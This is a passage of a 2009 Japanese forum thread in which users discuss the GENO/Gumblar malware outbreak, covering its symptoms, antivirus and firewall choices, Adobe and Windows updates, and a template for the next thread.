832 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 09:00:41 ]: >>828
俺、avast単独で使ってるんだけどダメなのか？
833 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 09:02:47 ]: 俺のところも、前回のラトビアの規制だけして、adobeのバージョンアップはなし。
業務に影響を及ぼしうるadobeのバージョンアップは許可できないんだそうでｗ
業務用バスターｗ入れてるから大丈夫とか、もうアボガドバナナと。
834 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 09:04:04 ]: >>815
www.adobe.com/support/security/#flashplayer
日本のサイトはアップデートが遅い。
最新じゃないのに、最新といってくる。

>>832
FWは入れたほうがいいのでは？

コマンドプロンプトやレジストリ起動不可能っていう情報も、ミスリードさせるSE攻撃かもな。
835 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 09:05:13 ]: >>832
FWはルータの内側で使ってるならなくてもいいかもね。
Avast!単体だとマルウェアやスパイウェアの類はスルーされる可能性があるから
入れておいた方がいいと思う。
836 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 09:06:58 ]: Avast+UAC+WindowsFWが手軽でわりと安全
837 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 09:16:44 ]: >>835
ルータ（ホームゲートウェイ）の内側で使用してるわ

FW（ファイアウォール）って、ルータとかで外部のインターネットと
隔絶されている環境（LANとか）ならもう入っているんでしょ？
838 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 09:22:49 ]: >>837
ルータにはポート、プロトコルベースのFW機能はあるけど、自分で設定しなければ
ザルだよ。標準状態ではTeredoが通過しちゃうものも多いし。
839 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 09:29:49 ]: 本物のウィルスより怖いわ
バックアップとっておくかな
840 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 09:35:07 ]: ＩＤがでないから、誰が何を書いているのか分からんな。

>>837
使っているOSは？

ルーターが仮に100パーセント外部からの攻撃は防げたとしても、
内側からのリクエストはスルーするからね。
ブラウザでリンク先をクリックすれば、
ルータに遮断されずに次のページの（外部）情報がローカルに戻ってくるのと同じ方法で
悪さをされないともいえない。

PCに入ったマルウェアが外部に情報を送ったりってのを防げる確立が減る。
ＦＷ入れてても、ＩＥとかに偽装されて通信されるんだから、入れたほうが良いよ。

フリー　HIPS Firewall OR ファイアーウォール
でググルんだ。
841 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 09:40:50 ]: >>840
OSはWinMe
FWってルーターの内側でも別個に入れておかないとダメなもんなの？
俺はavast入れておいたから、もう大丈夫だと思ってたよ
セキュリティソフトってファイアウォールの役割もあるんじゃないの？
842 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 09:42:12 ]: Meなんか捨てろ
843 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 09:56:02 ]: >>842
２００４年に中古ＰＣを買ったとき、プリインストールされていたんだよ
まだ５年しか使ってないんだぞ？ネットゲームとかしない限りは、普通に
ブラウザでＨＰも閲覧できるし・・・特に問題はないんだが

たった、５年で捨てるとか、買い換えるとか、車とかＴＶ，冷蔵庫じゃありえん
844 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 09:57:16 ]: 知り合いは言っても無駄だから全部人柱、観察対象でｵｹ。
845 名前：613 mailto:sage [2009/05/15(金) 09:57:37 ]: >>614-615
ありがとう、調べてみる
846 名前：840 mailto:sage [2009/05/15(金) 09:57:41 ]: >>841

>FWってルーターの内側でも別個に入れておかないとダメなもんなの？
だから、入れておかないとダメって言ってるじゃん。

>>779と同じ人？
はっきり言って、君のような人がボットネットやマルウェア拡散の踏み台になっているんだよ。
>>779-788
は読んだ？

avastはFW入ってないでしょ？
ウィルス対策とファイアーウォールは別。
ノートンとかウィルスバスターはＦＷも統合されているけど、ウィルス対策だけを抜き出している製品もある。
avastは抜き出された方と同種であり、セキュリティーの一部を担っているだけ。

ルーターも初期設定で使ってそうだな。　ルーターだと思っていたが、実はモデムだったってオチすらありそうだ。
847 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:01:21 ]: 何か色々あったが3日で直った、多分このウイルスの現象
１、とりあえずＩＥが満足に使用できなくなる
ＩＥの再インストール？上書き？でとりあえず直る
２、公式ログイン制のオンラインゲームが起動しなくなる
どうやらパスワードの認識が通らなくなる様子、何故通らなくなるのかは知らん
avastのアップデートが出来なかったり、エアーステーションに接続できなくなったり等
３、ｃｍｄが使えなくなる、色々方法を探してたときに気づいた
結局cmdは使ってないけどな、復元ポイント早速作っておいたわ

とりあえずスパイウェア削除してavast起動したらシステムメモリ内にウイルス混入してたっぽく
再起動後にスキャンするとか言うのをやったら直ったっぽい
848 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 10:03:37 ]: >>846
ルーターであることは確かだよ
光回線だし、モデムだけじゃなくてホームゲートウェイで
インターネットに接続しているから

ただ、初期設定の状態で使っていることは確かだな
ルーターの設定を勝手に弄って、変な設定に変えたらまずいし

とりあえず、もう少ししたらＸＰのインストールされたＰＣに買い換えようと考えている
849 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:04:54 ]: >>848
7にしておこうよ？
850 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:05:02 ]: >>847
何でその時点の復元ポイント作るんだよｗｗｗ
悪いことは言わんからＯＳ再インストールしてメール等、思いつくもののパスワード全部変更しとけ。
851 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 10:05:47 ]: そうそう、何かの雑誌で「セキュリティソフトは１個だけインストールするのが基本で
複数のソフトを入れると競合が起きてまずい」って書いてあったんだよ
だから、俺はavast一本にして、他のＦＷとかも一切入れなかったんだ
852 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:08:38 ]: avastはFW入ってないから競合しようがないと思うが、することあるん？
853 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 10:22:19 ]: ＦＷもセキュリティソフトの一種だから、競合起こしたらまずいと思っていたんだが・・・
854 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:23:56 ]: >>851
それはノートンとかの話でしょ？

それにお前はavastにFWが搭載されていると思っていたんだろうが。

>>849
一刻を争う時に半年後の話をしてどうする。
855 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:23:57 ]: >>852
対策されてるかわからんが、一昔前はある事もあったよ。
ＦＷ単体のほかにウイルススキャンのソフトもやってる会社だったから、他社製品に対して意図的に競合起こしてんじゃねえの？
って言われたりしてた。
856 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:25:08 ]: もう1回ニフ見てくるか
857 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:26:42 ]: >>843
中古で買った日から起算して5年とかバカなの?
MEはその名のとおり2000年、前世紀(20世紀)の遺物で
2004年当時はXPに対してSP2が出ている。

おまけに10年前だろうと去年だろうと車やVTや冷蔵庫の性能は大して変わらんが
PCの能力やそれを取り巻く環境(ネット等のインフラ、その利便性と脅威)は
大幅に変わるんだよ。XPSP2もBlasterやSasserの猛威があって
日本中の郵便局でCDを配っただろ。
MEは現時点であらゆるサポートが切られている。
858 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:27:10 ]: >>855
そうなんだ、㌧
859 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:29:00 ]: XP使ってるんだがカスペオンスキャンで感染見つからなければセーフ？
860 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:31:23 ]: Meが何の略かとかさっぱり忘れてたぜ
861 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:32:05 ]: つーかよく9x系未だ使ってられるよな。
システムリソース気にしながら作業なんて
もう考えたくねえ
862 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:35:30 ]: >>854
> >>849
> 一刻を争う時に半年後の話をしてどうする。

だってこれからXP買おうとしてる人にVISTA勧めるのもなぁ
863 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:36:12 ]: ニフもGENOも問題なくなってるのか
馬は警報きた
864 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:37:37 ]: 夏過ぎに７にアップグレードできるＶＩＳＴＡ搭載機は出るとは思うが、
この馬鹿は懲りずに中古買いそうだ。
865 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 10:47:42 ]: >>843
>たった、５年で捨てるとか、買い換えるとか、車とかＴＶ，冷蔵庫じゃありえん

Windows Meは車検切れ。
製造のMicrosoftしか車検はできず
そのMicrosoftがWindows Meはもう車検しませんと言っている。
866 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:01:02 ]: >>747
大塚製薬に謝れ!!
867 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:04:05 ]: まあPCは特殊分野だからねえ
F1マシンに例えると今期のマシンが最高速度300km/hだったのが来期は600km/h
その翌年には1200km/hになってるようなもの
ちょっとおかしな世界なのよマジで
868 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 11:04:51 ]: >>863
馬て何？
869 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:08:12 ]: >>748
NTTだけ反応するなあ
870 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:12:59 ]: この程度ならVista UACを使うまでもなく、ルーター＋Win2k+で問題ないでしょ。
871 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:14:46 ]: >>868
トロイ奴だなｗ
872 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 11:21:05 ]: >>871
あ、なるほどｗ
873 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:30:40 ]: >>843
世界が違うんだよ。家電と。解らないならパソコン辞めろ
874 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:40:35 ]: >>870
そうだな
Vistaは誰でも簡単にセキュリティが保てるようにしただけの物だから上級者なら2000でも十分だな
ただ2000のアップデートももうじき終わるのが痛いな
875 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:42:55 ]: >>847

おいおいｗ

ある日莫大な請求がいってもしらんぞ
876 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:44:53 ]: ＸＰのサポートっていつまで続くの？
877 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:46:07 ]: 2014年まで
878 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:48:11 ]: Windows2000やXPでセキュリティを保つよりVista以上のOSに
ルータ、アンチウイルス、PFWなどを入れて各種の最新のパッチ入れたほうが楽だろな
俺はWindows7に期待している
879 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:54:39 ]: スレの伸び方が怖いお。

ノートンとかが対応しないのは横柄？
それとも、まだ全然脅威でない、ってな見解？
880 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:55:54 ]: VISTAはユーザーにつかいにくいとフルボッコ状態だったけど
ウイルスからフルボッコされないって皮肉なもんだね
881 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:57:48 ]: まあ、それだけシェアが少なくて相手にすらされてない現状なんじゃね？
シェアがVISTA系のみならUAC回避の方向で作られただろうしさ。
882 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 11:58:38 ]: >>880
Macと同じだろ。
不人気だからウィルス作者にも相手にされない。
もしVistaのシェアが激増すれば攻撃されまくるだろうけどね。
Vistaは表面上、セキュリティ厳重に見えちゃうから、
もし攻撃対象になったら素人どもが阿鼻叫喚だと思う。
883 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:03:34 ]: XP Pro SP2 Firefox3.0.10 です

WindowsUpdate
PDFリーダーを最新にする
AdobeFlashを最新にする
ウイルスバスター2008
NoScript
これだけじゃ防げないの？
884 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:03:35 ]: OSは最新を使っていればセキュリティはまちがいないな
885 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:10:01 ]: >>883

当面はだいじょうぶだろうけど油断禁物
886 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:10:11 ]: >>883
OSに関してはMicrosoftUpdateのほうでおねがいします
なんでSP2なのかわからんけどSP3を当ててね
887 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:10:32 ]: >>883
とりあえず今のところは防げるんじゃないの
しかし、優秀なGENOウイルスメンバーは、
セキュリティの盲点を新たに突いてやってくるから恐いんだよ
888 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:11:34 ]: >>859
それだけじゃセーフとはいえない
>>879
横柄とかそんなアホな問題じゃなくて
中身が変わりすぎて対応しきれないだけ
889 名前：883 mailto:sage [2009/05/15(金) 12:16:00 ]: >>885-887
ありがとう、油断はできないんだねｗ

>OSに関してはMicrosoftUpdate
WindowsUpdateとなんか違うんですか？

>なんでSP2なのかわからんけど
SP3入れて不具合っての良く見かけたもんで躊躇してますｗ
890 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:17:22 ]: ｗ
891 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:22:58 ]: ttp://www3.atword.jp/gnome/2000/01/13/block-list/
↑サイトを見てルータでIPフィルタリングしたいんだけど、送信／受信両方とも登録しなきゃだめかな
892 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:26:21 ]: >>889
ＳＰ３に関して、今はあら捜しが好きな奴が大々的に言ってるだけ。
まあ、ＳＰ２出たばっかりの頃を経験してるから、アップデート躊躇する気持ちもわかるけどね。
893 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:40:41 ]: PayPalのお金がなくなってた！

こいつのせい！？
894 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:41:15 ]: >>891
送信だけでいいと思うよ
895 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:42:49 ]: >>893
俺も戸棚に置いといた茶菓子が無くなってた！

こいつのせいに違いない！
896 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:44:14 ]: >>891
某メーカーのルータはフィルタリングしても効いてないやつあるから注意な
897 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:45:00 ]: メインはfirefoxでIEはめったに使わないんだけど
IE6のままだと心配？7か8にしたほうがいいのかな？
898 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:45:09 ]: >>895
おい！
さっきまで腹減ってたのになんだか腹一杯になってるぞ！
お前のせいか！
899 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:46:51 ]: >>897

IEは他のウイルスにも狙われてるから危険
900 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:48:19 ]: >>897
せめて7にしとけばいいんでない？
8は入れたけど7に戻したわ。

>>899
>>897はupdateとかでたまに使う程度だと思う
901 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:52:02 ]: >>900
やっぱりIE6じゃまずいか･･･7入れてみるよ

updateとかでたまに使う程度だけど
902 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:53:28 ]: >>901
firefoxにieのプラグインを入れたらいい
903 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:56:00 ]: もし個人HPとか作成していたらそれもやばいのか
904 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:57:43 ]: >>903
そりゃヤバイだろ
905 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:58:22 ]: >>902
結局それieエンジンになるから同じことじゃね？
906 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 12:58:30 ]: 大手企業さえああいうことになってる訳だし～
907 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 12:59:00 ]: ちょっとまてよ…
firefoxにieのレタリングをアドオンをすれば
限りなくieの脆弱性をもつfirefoxになるのか？どうだろ
908 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:02:51 ]: >>902
アホや、アホがおる
909 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:04:05 ]: アドオン入れてたかもしれん
削除しとこー
910 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:04:32 ]: >>902
それが一番危ないんだよｗｗｗ
911 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:04:58 ]: IEかどうかを調べているから純正IEよりはマシじゃね
912 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:05:02 ]: >>908
スマンorz
913 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:05:20 ]: 本プラグインの現バージョンでは、IEエンジン使用時にSSLを使用したサイトを鍵マークなどで
区別する手段が用意されておらず、IEエンジンのまま普段訪問しないサイトを利用するのは
セキュリティ上の不安がある。
そのため現状では、“Gecko”エンジンを主に使い、よく利用するが「Firefox」などに対応していない
サイトを利用する際にIEエンジンに切り替える、といった使い方にとどめておくことをお勧めする。

ttp://www.forest.impress.co.jp/article/2006/01/16/ietab.html
914 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:06:42 ]: >>907
なりません
915 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:07:06 ]: もうね危ないからネットのケーブルはずしちゃお。
これで気兼ね無くネットができ……アレ?　
916 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:07:58 ]: 深刻なはずなのに、たまに和むレスがあるなｗｗｗ
917 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:09:44 ]: dxd8.com/archives/192/

ホームページ制作会社が感染というは危険がありますか？

発注先の会社が感染しているか確認する方法はありませんか？
918 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:10:31 ]: ソースみりゃ
919 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:10:53 ]: >>917

ｗｗｗ

あるわけないだろｗ

直接聞いてみたら？
920 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:13:48 ]: >>917

まじかよ。

危険もなにもやばすぎるだろ…。

ウイルス入りのページばらまかれたらたまらないな。

制作会社のソースを確認したほうがいいぞ。
921 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:14:31 ]: ありがぞうございます

ソースというのはどこで見ればいいのでしょうか？
922 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:15:26 ]: >>921

冷蔵庫に入ってるんじゃね
923 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:17:30 ]: >>889
SP2へのアップデート時にはかなりの変更があったのでトラブルが続出したけど
SP3は基本的にセキュリティ修正なのでだいたい問題ないはず

WindowsUpdateはOSのみ。MicrosoftUpdateはOS、Office他。
Office入ってなくてもWindowsUpdateじゃ更新されないものがあるんで
こちらを推奨だそうです。
www.microsoft.com/japan/technet/prodtechnol/microsoftupdate/default.mspx
924 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:17:52 ]: ｗｗｗ

マジレスすると今すぐ電話して聞け
925 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:18:50 ]: JAVA切っちゃってみんな絶対動画サイト見ないの？
俺は我慢できんからつべとニコ許可しちまった
926 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:20:00 ]: >>925
JavaじゃなくてJavaScriptのほうね
927 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:21:55 ]: >>923
ありがとう、Office入ってないけど考えてみます
928 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:22:21 ]: ここにどう動作してるのか詳細に説明してあるな。
ttp://ilion.blog47.fc2.com/blog-entry-128.html

このタイプはVISTA系以外でIE系なのか調べて該当したら、
Adobeの脆弱性を利用して感染している様だ。

次はどんな亜種が出てくるのやら
929 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 13:22:43 ]: 制作会社感染はまずすぎますね

定期age
はじめてきた人はここで確認してください

www3.atword.jp/gnome/
930 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:23:48 ]: >>925
同じくｗ

加えてyahooとgoogleも許可してるけどまずいのか？
931 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:24:57 ]: JavaScriptは切ってないな
リーダーの方をアンインストした
又インストすれば良いし
932 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:26:01 ]: 感染するとどんな挙動になるんです？
933 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:26:35 ]: >>928

IEだとめちゃ危険じゃん…。
934 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:28:41 ]: >>932

ある日突然パスワードが盗まれます
935 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:31:20 ]: もうやだ…検索するのさえ怖い
936 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 13:32:59 ]: ttp://www3.atword.jp/gnome/2000/01/13/block-list/
ここのListをPG2や葱用にBlock.txt作ったけど要る？
937 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:34:29 ]: 類をみない凶悪さだ思うんだが、思ったより騒がれていないな。

もっと取り上げられてもいいはず。

IE系で無自覚で感染しているやつが多そうで怖いよ。
938 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:35:10 ]: >>936

くらはい
939 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:35:12 ]: 大体解決したね
もう次スレいらないね
940 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:35:54 ]: 久しぶりに見たわそれ
941 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:36:50 ]: 次スレそろそろ立てるシーズンだけど
テンプレ考えようか
942 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:36:51 ]: >>937
大きくニュースで取り上げられたら普通の人も怖さに気付く
943 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:37:12 ]: パスワード盗まれるだけで
ＰＣに挙動がおかしくなったりしないの？
ＰＣ異常きたさずにパスだけ抜かれるなら
怖いな
944 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:37:17 ]: 解決してねーだろｗ

ここのやつらは解決してるだろうが。
945 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:37:55 ]: >>928
IEじゃなくても危険ということか…
946 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:39:08 ]: >>945

どこをどう読んだらそうなる？
IE系がターゲットにされてるんだよ

IE以外も油断はできない早さで進化してるけどな
947 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:42:12 ]: 挙動おかしくなるて書いてたよ
948 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:43:29 ]: >>946
928を書いた人か？
949 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:43:42 ]: もうイヤだ。
こんなインターネッツ。
950 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:44:29 ]: >>948

違うよｗ
951 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:45:03 ]: 再起動でけた
小林製薬のHP見たことあるからびびってたんですよ
952 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:45:45 ]: ふっつーにOperaでも感染しそうになったよ
Adobe ReaderのJavaScriptを切っていたから助かったみたいだけど
もちろんUA偽装なんかしてないぞ
953 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:46:21 ]: >>943
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

これ天婦羅に揚げた方がいいんじゃないか？
954 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:46:42 ]: また新種きてるってこと？

そろそろ次スレ準備お願いします。
955 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 13:47:11 ]: >>941
感染を疑った人の報告をテンプレで統一化するのは？

【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】

こんな感じにすれば診断する側も
見やすい気がするお
956 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:47:14 ]: 【解決】GENOウイルススレ 4【してません】
957 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:47:40 ]: >>953
これとあテンプレ候補よろ～

立ててくるから
958 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:48:24 ]: とりあえずそんなもんかな？

よろしくー。

一般人が騒ぎ出す頃が一番やばそうだね。
959 名前：936 mailto:sage [2009/05/15(金) 13:49:06 ]: >>938
ttp://www.rupan.net/uploader/download/1242362767.txt
960 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:49:38 ]: テンプレとしてこれに追加で良いかな

感染が疑わしい人は迷わずクリーンインストール推奨です。

★Anubisレポート
anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★過去スレ
GENOウイルススレ　★3
pc11.2ch.net/test/read.cgi/sec/1240853183/

GENOウイルススレ　★2
pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
pc11.2ch.net/test/read.cgi/sec/1239152979/
961 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:50:29 ]: >>5　のサイトもいれてほしい
962 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:52:02 ]: >>959

ありがと

これも追加してもらってもいいかな？
963 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:52:49 ]: 製薬会社のメールマガジン登録してるんだけど
これも開いたら危ないのかな…
964 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:53:41 ]: とりあえず残りのレスはテンプレに入れてほしいものを書き出そう
965 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:54:24 ]: >>5
>>19
966 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:55:10 ]: 次スレです。
追加のテンプレを考えてください。
随時追加します。

GENOウイルススレ　★4
pc11.2ch.net/test/read.cgi/sec/1242363241/
967 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:57:57 ]: おつー

>>19 もたのんます
968 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:58:10 ]: まず最新バージョンにする
Adobe Flash Player 10.0.22.87
Adobe Reader 9.1.1（5/12アップデート）

AdobeReader設定で、
「PDFをブラウザに表示」「Adobe Javascripを使用」
っていうところのチェックボックスを外す
ほとんどのAdobeReaderプラグインの脆弱性を狙ったウイルスにやられなくなる

--
これはいれたほうがいいかな？
969 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 13:59:08 ]: 　・IEを使用しない
　・FirefoxならNoScriptを入れる

これも最初に入れてくれ
970 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:02:07 ]: テンプレに、So-netの記事と小林製薬他の「まともな告知をしている所」のリンク張っといたら？
説明するのに楽だろ。
971 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:02:08 ]: 現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
　※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している（このため、セキュ各社の自動検出が難しくなっている）
感染しない環境には何も返さない（更に検証が難しい）
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
　※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
972 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:03:14 ]: 【OS】 Windows Me
【使用セキュリティソフト】 avast! 4.8 Home Edition
【疑った理由】　106hotline.com/guidance/kiso_syougou.html にアクセスしようとしたら、avastが反応したため
【症状】 avastが反応し、警告音と共に「JS:Redirector-H2（トロイの木馬）を検出した」と表示されたので、
